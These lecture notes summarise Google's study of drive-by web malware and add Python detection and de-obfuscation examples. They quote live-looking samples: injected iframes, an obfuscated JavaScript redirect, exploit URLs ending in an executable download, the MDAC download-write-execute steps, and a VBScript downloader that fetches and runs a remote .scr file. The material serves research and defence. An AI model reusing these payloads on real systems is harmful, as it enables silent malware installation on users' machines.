The Ghost In The Browser: Analysis of Web-based Malware
Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu, Google, Inc.
Preface
Google's large existing body of data
Google and Microsoft
Introduction
This paper describes a new trend: using web-based delivery to carry out exploits.
Unlike traditional botnets that use push-based infection, web-based malware infection follows a pull-based model, creating botnet-like structures.
Data was collected over a 12-month period starting in March 2006.
Related Works
Alex Moshchuk: http://research.microsoft.com/en-us/people/alexmos/
He showed a decrease in drive-by-downloads over time.
Limitation: a small data set.
Related Works
HoneyMonkey: finer-grained, case-specific vulnerabilities. http://research.microsoft.com/en-us/um/people/ymwang/
Definition of "Malicious" in This Paper
A web page is deemed malicious if it causes the automatic installation of software without the user's knowledge or consent.
Detecting Dangerous Web Pages
The approach does not attempt to investigate the actual behavior of the installed software, but rather identifies the mechanisms used to introduce the software into the system via the browser.
Detection architecture (diagram)
MapReduce
MapReduce is used to process the large set of URLs and all links to potential exploit URLs.
The output is the set of malware URLs (pages).
Monitor and Analysis
1. New processes being started.
2. Registry and file system changes.
Each recorded component is scored using different anti-virus engines, and all scores are summed into a total score. This is the general approach; the paper does not give the details.
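A worked version of the scoring step described on this slide, added here as an example and not taken from the paper or from Google's system. The paper only says that each recorded component (new process, registry change, file change) is scored with several anti-virus engines and the scores are summed; the weights, engine names, sample observations and threshold below are therefore constructed assumptions.

```python
"""Scoring a sandboxed page visit.

Added example, not code from the paper. The slide says the analyzer records
new processes plus registry and file-system changes, scores each recorded
component with several anti-virus engines and sums the scores. The paper
gives no details, so the weights, engine names, observations and threshold
below are constructed assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Observation:
    kind: str                  # "process", "registry" or "file"
    detail: str                # what changed (constructed sample paths below)
    # Verdict per anti-virus engine: a label string, or None for "clean".
    av_verdicts: Dict[str, Optional[str]] = field(default_factory=dict)


# Assumed weights: any recorded change contributes a little, each engine
# detection contributes more. A real deployment would tune these.
BASE_WEIGHT = {"process": 1.0, "registry": 0.5, "file": 0.5}
AV_DETECTION_WEIGHT = 2.0
MALICIOUS_THRESHOLD = 4.0     # assumed cut-off for labelling the page


def score_component(obs: Observation) -> float:
    """Score one recorded component: base weight plus one unit per engine hit."""
    detections = sum(1 for verdict in obs.av_verdicts.values() if verdict)
    return BASE_WEIGHT.get(obs.kind, 0.0) + AV_DETECTION_WEIGHT * detections


def score_visit(observations: List[Observation]) -> Tuple[float, bool]:
    """Sum component scores; the page is flagged when the total crosses the threshold."""
    total = sum(score_component(o) for o in observations)
    return total, total >= MALICIOUS_THRESHOLD


# Constructed sample visits (not real sandbox output).
MALICIOUS_VISIT = [
    Observation("file", r"C:\Windows\Temp\dropped.exe",
                {"engine_a": "Trojan.Downloader", "engine_b": "Trojan", "engine_c": None}),
    Observation("process", r"C:\Windows\Temp\dropped.exe",
                {"engine_a": "Trojan.Downloader", "engine_b": "Trojan", "engine_c": None}),
    Observation("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dropped"),
]
BENIGN_VISIT = [
    Observation("file", r"C:\Users\u\AppData\Local\Temp\cache\page.html",
                {"engine_a": None, "engine_b": None, "engine_c": None}),
]


if __name__ == "__main__":
    for name, visit in (("malicious", MALICIOUS_VISIT), ("benign", BENIGN_VISIT)):
        total, flagged = score_visit(visit)
        print(f"{name}: total={total}, flagged={flagged}")
```

Counting engine hits rather than trusting any single engine is what makes the sum robust to one vendor missing a fresh sample; the threshold is where false positives from ordinary browser cache writes are traded against missed drive-by installs.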
Peak performance: 300,000
URLs
Total: 4.5 million URLs; 450,000 URLs were engaging in drive-by-downloads. About 10% of the URLs were malicious.
Injecting malicious content on popular web sites
Web server security; user contributed content; advertising; third-party widgets.
Web Server Security
Scripting applications (web packages, modules): phpBB2, InvisionBoard
Invision Power Board
<!-- Copyright Information --><div align='center' class='copyright'>Powered by <a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final © 2003 <a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
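The following added example (not the paper's code) ties this slide to the MapReduce slide above: it extracts the off-site <iframe> and <script> references that an injection like the one in this footer leaves behind, then aggregates them MapReduce-style so that many compromised pages pointing at one exploit URL collapse into a single count. The page bodies, host names and first-party/third-party split are constructed placeholders.

```python
"""Extracting external <iframe>/<script> references and aggregating them.

Added example, not the paper's code. It does two of the things the slides
describe: find injected references to third-party hosts in a page (as in the
Invision Power Board footer) and, MapReduce-style, map each page to the
external URLs it loads, then reduce to "which pages point at the same exploit
URL". The page bodies and host names below are constructed placeholders.
"""
from collections import defaultdict
from html.parser import HTMLParser
from typing import Dict, Iterable, Iterator, List, Tuple
from urllib.parse import urljoin, urlparse


class RefExtractor(HTMLParser):
    """Collect the src of every <iframe> and <script> element."""

    def __init__(self) -> None:
        super().__init__()
        self.refs: List[Tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag in ("iframe", "script"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src))


def map_page(page_url: str, html: str) -> Iterator[Tuple[str, str]]:
    """Map step: emit (external_ref_url, page_url) for each off-site iframe/script."""
    parser = RefExtractor()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    for _tag, src in parser.refs:
        ref = urljoin(page_url, src)          # resolve relative src values
        if urlparse(ref).hostname != page_host:
            yield ref, page_url


def reduce_refs(pairs: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Reduce step: group pages by the external URL they point at."""
    grouped = defaultdict(set)
    for ref, page in pairs:
        grouped[ref].add(page)
    return {ref: sorted(pages) for ref, pages in grouped.items()}


def pages_per_exploit_url(pages: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Run map over every (page_url, html) pair, then reduce."""
    return reduce_refs(pair for url, html in pages for pair in map_page(url, html))


# Constructed sample pages imitating the footer shown on the slide.
FOOTER = ("<div align='center' class='copyright'>Powered by "
          "<a href='http://www.invisionboard.com'>Invision Power Board</a></div>")
PAGES = [
    ("http://forum-a.example/index.php",
     FOOTER + "<iframe src='http://attacker.example/adv/193/new.php'></iframe>"),
    ("http://forum-b.example/",
     "<script src='/js/common.js'></script>" + FOOTER +
     "<iframe src='http://attacker.example/adv/193/new.php'></iframe>"),
    ("http://clean.example/",
     "<script src='http://clean.example/app.js'></script>" + FOOTER),
]

if __name__ == "__main__":
    for ref, pages in pages_per_exploit_url(PAGES).items():
        print(f"{len(pages)} page(s) -> {ref}: {pages}")
```

Only iframe and script sources are collected, so the legitimate "Powered by" anchor in the footer is ignored; the reduce output is the same "pages pointing to each exploit URL" measure the later slides chart.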
User Contributed Content
Pages that permit posts and allow arbitrary HTML to be inserted (pages where others can leave comments and HTML is allowed): <iframe>, <script>
Even though HTML support is limited, ...
<SCRIPT language=JavaScript>
function otqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="('";awq27="";sftfttft=4;
fghdh="'ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om'";
dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="')";
if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>
De-obfuscating
location.replace('http://videozfree.com')
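An added example of how the de-obfuscation on this slide can be done statically, without running the script; it is not code from the paper. The resolver records the string and integer assignments, folds dh4=eval(...) into the literal that eval would return, and reconstructs the argument of the final eval(). The tiny grammar it accepts (name = "literal" | 'literal' | integer | eval(names joined by +)) is an assumption that covers this sample's style; the `function otqzyu(nemz)` header and the arithmetic guard are left alone and not evaluated.

```python
"""Static de-obfuscation of string-concatenation JavaScript.

Added example, not the paper's code. The slide's sample splits
location.replace('http://videozfree.com') into many short string variables
and joins them inside eval(). This resolver reconstructs what the eval calls
would receive without executing any JavaScript: it records string and
integer assignments, folds X=eval(a+b+...) into the literal it would yield,
and reports the argument of every remaining eval(). The grammar it accepts
is an assumption that covers this style of sample and nothing more.
"""
import re
from typing import Dict, List

# One statement at a time: an assignment of a string, an integer, or an
# eval() result to a name, or a bare eval(...) call.
STATEMENT = re.compile(r'''(?P<name>\w+)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<num>\d+)\b|eval\((?P<ev>[^()]*)\))|(?<![\w.])eval\((?P<call>[^()]*)\)''')

# The sample from the slide (straight quotes), constructed here as test input.
SAMPLE = r'''function otqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="('";awq27="";sftfttft=4;fghdh="'ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om'";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="')";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();'''


def _resolve(expr: str, env: Dict[str, str]) -> str:
    """Join the operands of a + expression using the known variable values."""
    parts = []
    for token in expr.split("+"):
        token = token.strip()
        if len(token) >= 2 and token[0] == token[-1] and token[0] in "'\"":
            parts.append(token[1:-1])               # inline string literal
        elif token in env:
            parts.append(env[token])
        else:
            parts.append(f"<{token or 'empty'}>")   # unresolved operand, kept visible
    return "".join(parts)


def _unwrap_literal(value: str) -> str:
    """eval("'abc'") yields abc: strip one layer of matching quotes.

    If the folded text is not a quoted literal, real eval() would execute it;
    this static resolver just keeps the text as-is.
    """
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def deobfuscate(source: str) -> List[str]:
    """Return the reconstructed argument of every bare eval() call, in order."""
    env: Dict[str, str] = {}
    results: List[str] = []
    for m in STATEMENT.finditer(source):
        if m.group("call") is not None:
            results.append(_resolve(m.group("call"), env))
        elif m.group("dq") is not None:
            env[m.group("name")] = m.group("dq")
        elif m.group("sq") is not None:
            env[m.group("name")] = m.group("sq")
        elif m.group("num") is not None:
            env[m.group("name")] = m.group("num")
        else:
            env[m.group("name")] = _unwrap_literal(_resolve(m.group("ev"), env))
    return results


if __name__ == "__main__":
    for call in deobfuscate(SAMPLE):
        print("eval would receive:", call)
```

Because nothing is executed, the same pass can run over crawled pages at scale; its limit is that any construct outside the tiny grammar is reported as an unresolved `<name>` placeholder rather than silently guessed.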
Advertising
Renting out advertising space to third parties
Third-Party Widgets
Hit counters. Another example: iframemoney.org
Example
<!-- Begin Stat Basic code -->
<script language="JavaScript" src="http://m1.stat.xx/basic.js"></script>
<script language="JavaScript"><!--
statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);
// --></script>
<noscript><a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA"><img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA" border="0" nosave width="18" height="18"></a></noscript>
<!-- End Stat Basic code -->
d.write("<scr"+"ipt language='JavaScript' type='text/javascript' src='http://m1.stats4u.yy/md.js?country=us&id="+ id +"&_t="+(new Date()).getTime()+"'></scr"+"ipt>")
Triggering further exploit code
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe
Microsoft Security Bulletin MS03-011: A flaw in Microsoft VM Could Enable System Compromise.
Exploitation Mechanisms
The adversary first needs to gain control over a user's system. Traditionally: find vulnerable network services and remotely exploit them (limited by NAT and firewalls).
Now: lure users to connect to malicious servers.
Because the traditional approach is constrained, attackers use web servers (web pages) and drive-by downloads instead.
Once a vulnerability has been discovered, an adversary can choose an appropriate exploit and ask the web browser to download it.
Exploiting Software
In the browser; launched external programs; download, store and then execute a malware binary (drive-by-download).
Microsoft's Data Access Components
http://www.microsoft.com/taiwan/technet/security/bulletin/ms06-014.mspx
JavaScript can reliably accomplish this. This kind is harder to analyze: for example, the payload can be downloaded only once, after which the URL returns an empty response.
Example
The following example illustrates the steps taken by an adversary to leverage this vulnerability into remote code execution:
• The exploit is delivered to a user's browser via an iframe on a compromised web page.
• The iframe contains JavaScript to instantiate an ActiveX object that is not normally safe for scripting.
• The JavaScript makes an XMLHTTP request to retrieve an executable.
• Adodb.stream is used to write the executable to disk.
• A Shell.Application is used to launch the newly written executable.
A twenty-line JavaScript can reliably accomplish this sequence of steps to launch any binary on a vulnerable installation.
WebViewFolderIcon
Heap spraying. Code here: http://forum.eviloctal.com/archiver/tid-25077.html
Use JavaScript to catalog the browser (IE or Firefox), and also the JVM version and the OS patch level.
EX: http://blog.yam.com/visioncan/article/10598530
<script>
window.env = new function() {
  this.isOpera = (window.opera && navigator.userAgent.match(/opera/gi)) ? true : false;
  this.isIE = (!this.isOpera && document.all && navigator.userAgent.match(/msie/gi)) ? true : false;
  this.isSafari = (!this.isIE && navigator.userAgent.match(/safari/gi)) ? true : false;
  this.isGecko = (!this.isIE && navigator.userAgent.match(/gecko/gi)) ? true : false;
  this.isFirefox = (!this.isIE && navigator.userAgent.match(/firefox/gi)) ? true : false;
};
//=====================
var s = "";
for (var i in env) { s += i + " : " + env[i] + "\n"; }
alert(s);
</script>
EX: http://demo.tc/Post/366
<script type="text/javascript">
var isIE = navigator.userAgent.search("MSIE") > -1;
var isIE7 = navigator.userAgent.search("MSIE 7") > -1;
var isFirefox = navigator.userAgent.search("Firefox") > -1;
var isOpera = navigator.userAgent.search("Opera") > -1;
var isSafari = navigator.userAgent.search("Safari") > -1; // Google's browser uses this engine
if (isIE7) { alert('isIE7'); }
if (isIE) { alert('isIE'); }
if (isFirefox) { alert('isFirefox'); }
if (isOpera) { alert('isOpera'); }
if (isSafari) { alert('isSafari'); }
</script>
JVM EX: http://forums.sun.com/thread.jspa?threadID=547717
alert("javaEnabled " + window.navigator.javaEnabled());
alert("java version " + java.lang.System.getProperty("java.version"));
Tricking the User
Trick the user into downloading and running the malware, e.g. by presenting it as a codec (decoder).
Obfuscation
Tutorial: http://anti-hacker.blogspot.com/2008/02/javascript7.html
JavaScript obfuscated this way can evade detection. But some reputable sites also use obfuscation, so treating obfuscation alone as a malicious indicator produces false positives.
Example
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o...%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>
-------------------------------------------------------------------------------------
<SCRIPT LANGUAGE="Javascript"><!--
/* criptografado pelo Fal - [...]
document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20...D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));//--></SCRIPT>
<script language="VBScript">
on error resume next
dl = "http://foto02122006.xxx.ru/foto.scr"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
...
S.close
set Q = df.createobject("Shell.Application", "")
Q.ShellExecute fname1, "", "", "open", 0
</script>
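An added example (not from the paper) of the analysis step the previous two slides imply: peeling nested document.write(unescape("...")) layers statically, with JavaScript's unescape() semantics (%XX bytes and %uXXXX code units), and then scanning the innermost text for the COM objects and classid these slides show. The nested payload is constructed in the block itself by encoding a VBScript skeleton that follows the slide's shape; the download URL is a placeholder.

```python
"""Peeling nested unescape() layers and flagging dangerous COM usage.

Added example, not the paper's code. The slides show
document.write(unescape("%3C...")) wrapping a further unescape() layer that
finally yields VBScript. This code peels such layers without executing
them (JavaScript unescape semantics: %XX bytes and %uXXXX code units) and
scans the innermost text for the indicators the slides name. The nested
payload below is constructed here by encoding a VBScript skeleton; the
download URL is a placeholder.
"""
import re
from typing import List
from urllib.parse import quote, unquote

UNESCAPE_CALL = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')

# Strings worth flagging in decoded script; the classid is the one on the slide.
INDICATORS = [
    "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36",
    "Microsoft.XMLHTTP",
    "ADODB.Stream",
    "Shell.Application",
    "ShellExecute",
    "on error resume next",
]


def js_unescape(text: str) -> str:
    """Decode like JavaScript's unescape(): %uXXXX first, then %XX as single bytes."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")


def peel(source: str) -> List[str]:
    """Return each successive decoded layer until no unescape("...") call remains."""
    layers: List[str] = []
    current = source
    while True:
        matches = UNESCAPE_CALL.findall(current)
        if not matches:
            return layers
        current = "\n".join(js_unescape(m) for m in matches)
        layers.append(current)


def indicators(text: str) -> List[str]:
    """Case-insensitive search for the known-bad strings."""
    lowered = text.lower()
    return [ind for ind in INDICATORS if ind.lower() in lowered]


# Constructed VBScript skeleton following the slide's shape (elided parts omitted).
INNER_VBSCRIPT = (
    '<script language="VBScript">\n'
    'on error resume next\n'
    'dl = "http://download.placeholder.test/payload.scr"\n'
    'Set df = document.createElement("object")\n'
    'df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"\n'
    'Set x = df.CreateObject("Microsoft.XMLHTTP", "")\n'
    'Set Q = df.createobject("Shell.Application", "")\n'
    '</script>\n'
)


def wrap(payload: str) -> str:
    """Build one document.write(unescape("...")) layer around payload."""
    return f'document.write(unescape("{quote(payload, safe="")}"));'


NESTED_SAMPLE = wrap(wrap(INNER_VBSCRIPT))   # two layers, as on the slide


if __name__ == "__main__":
    for depth, layer in enumerate(peel(NESTED_SAMPLE), 1):
        print(f"layer {depth}: {layer[:60]!r}...")
    print("indicators:", indicators(peel(NESTED_SAMPLE)[-1]))
```

Decoding with latin-1 reproduces unescape()'s byte-per-%XX behaviour (the slide's %E7%E3 become the Portuguese "ça" rather than a decode error), and matching the indicator list only on the fully peeled text avoids the false positives the obfuscation slide warns about when obfuscation alone is used as the signal.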
Malware Classification
Classified using antivirus software into the following 3 categories: Trojan (the usual installation technique), Adware (software that displays advertisements), Unknown/Obfuscated (undetermined).
200,000 unique malware binaries. Two binaries are assumed to be different if their cryptographic digests (hashes) differ.
Why this method (the reason for counting unique binaries this way)?
▪ Classification based on structural similarities or on the exploit used is expensive.
▪ No readily available tools.
Malware family / Percentage (chart)
Malware Analysis
Adware and Trojans are the most prevalent malware categories.
For adware, Trymedia and NewDotNet are the most common providers.
For Trojans, Trojan downloaders and banking Trojans are the most common.
Trymedia
Trymedia is adware that infects your computer through peer-to-peer networks, shareware programs and some websites.
It monitors your surfing activity, especially your shopping and banking habits, collects this information and sends it to the Trymedia server.
Based on this information your computer is bombarded with ad pop-ups.
NewDotNet
It tracks which websites a person visits and then pops up separate browser windows with targeted advertisements and special offers.
It continuously downloads updated information about new offers and collects a variety of information.
http://blog.xuite.net/reptile/diary/4539739
Trojan downloader
Usually a bootstrap to download other arbitrary binaries onto a machine.
Banking Trojans
Steal sensitive information such as bank account numbers and the corresponding passwords.
The extracted information is often sent back to the adversary via throw-away email accounts.
By unique URLs
Trojans are the most numerous, over 300,000.
Manual inspection of HTTP requests that were not issued by the browser:
Majority
▪ Pop-up ads
▪ Rank inflation
Some cases
▪ Receive binary updates and instructions
▪ Where the anti-virus engines provided a classification, the binaries were labeled either as Trojan or Worm.
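The triage on this slide was done by hand; the following added example (not the paper's code) automates the first cut over a constructed request log: it separates requests by originating process, ignores the browser itself, and flags process/host pairs that call back at a near-constant interval, which is the "query web servers periodically for instructions and updates" behaviour the conclusion describes. The log format, process names, hosts and thresholds are assumptions.

```python
"""Spotting periodic non-browser HTTP requests in sandbox logs.

Added example, not the paper's code. The slide says the analysts manually
inspected HTTP requests that were not issued by the browser and found, in
some cases, machines fetching binary updates and instructions. This script
automates the first cut of that triage over a constructed request log:
it separates requests by originating process, ignores the browser itself,
and flags process/host pairs that call back at a near-constant interval.
The log format, process names, hosts and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean
from typing import Dict, List, Tuple

BROWSERS = {"iexplore.exe", "firefox.exe"}
MIN_REQUESTS = 3          # need at least two intervals to judge regularity
MAX_JITTER_RATIO = 0.10   # intervals within 10% of their mean count as periodic

# Constructed log lines: timestamp, originating process, host, path.
LOG = """\
2007-02-11T10:00:00 iexplore.exe www.news.placeholder.test /index.html
2007-02-11T10:00:03 iexplore.exe ads.placeholder.test /banner.js
2007-02-11T10:05:00 svchost-lookalike.exe update.placeholder.test /cmd.php?id=1
2007-02-11T10:07:00 iexplore.exe www.news.placeholder.test /story.html
2007-02-11T10:20:00 updater.exe vendor.placeholder.test /version.txt
2007-02-11T10:35:02 svchost-lookalike.exe update.placeholder.test /cmd.php?id=1
2007-02-11T11:04:58 svchost-lookalike.exe update.placeholder.test /cmd.php?id=1
2007-02-11T11:35:01 svchost-lookalike.exe update.placeholder.test /cmd.php?id=1
"""


def parse_log(text: str) -> List[Tuple[datetime, str, str, str]]:
    """Parse the constructed four-column format into (time, process, host, path)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proc, host, path = line.split(maxsplit=3)
        rows.append((datetime.fromisoformat(ts), proc, host, path))
    return rows


def non_browser_requests(rows) -> Dict[Tuple[str, str], List[datetime]]:
    """Group requests from anything other than the browser by (process, host)."""
    groups: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, proc, host, _path in rows:
        if proc.lower() not in BROWSERS:
            groups[(proc, host)].append(ts)
    return groups


def find_beacons(groups) -> List[Tuple[str, str, float]]:
    """Return (process, host, mean_interval_seconds) for regularly repeating callbacks."""
    beacons = []
    for (proc, host), stamps in groups.items():
        if len(stamps) < MIN_REQUESTS:
            continue
        stamps = sorted(stamps)
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and max(abs(g - avg) for g in gaps) <= MAX_JITTER_RATIO * avg:
            beacons.append((proc, host, avg))
    return beacons


def triage(text: str):
    """Return the non-browser (process, host) pairs and the periodic ones among them."""
    groups = non_browser_requests(parse_log(text))
    return sorted(groups), find_beacons(groups)


if __name__ == "__main__":
    pairs, beacons = triage(LOG)
    print("non-browser (process, host) pairs:", pairs)
    for proc, host, avg in beacons:
        print(f"periodic callback: {proc} -> {host} every ~{avg:.0f}s")
```

The one-off request from the legitimate updater is listed for a human to look at but not flagged as periodic, which keeps the manual review focused on the pattern the slide found interesting: repeated, evenly spaced polling of one host by something other than the browser.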
Remotely Linked Exploits
The majority of the exploits were hosted on third-party servers and not on the compromised web sites.
The attacker had managed to compromise the web site content to point towards an external URL hosting the exploit, either via iframes or external JavaScript.
Or, less commonly, a complete redirect to another malicious site.
Number of pages pointing to exploit URLs (chart)
The reasons (the advantages of remotely hosted exploits)
1. Ease of management.
2. Having many pages point to a single site offers an aggregation point to monitor and generate statistics.
3. The portfolio of exploits can be updated by changing a single web page.
Splitting the traffic across sites…
Malware evolution
To avoid detection by anti-virus software, the fastest-changing malware is updated (changed) roughly once per hour.
Discussion
We expect that the majority of malware is no longer spreading via remote exploitation but rather as we indicated in this paper via web-based infection.
This rationale can be motivated by the fact that the computer of an average user provides a richer environment for adversaries to mine, for example, it is more likely to find banking transactions and credit card numbers on a user’s machine than on a compromised server.
Conclusion
1. Identified the four prevalent mechanisms used to inject malicious content on popular web sites.
2. Found a large number of malicious web pages responsible for malware infections, and found evidence that web-based malware creates botnet-like structures in which compromised machines query web servers periodically for instructions and updates.
3. Malware binaries change frequently.
4. To achieve better exposure and more reliability, malware binaries are often distributed across a large number of URLs and domains.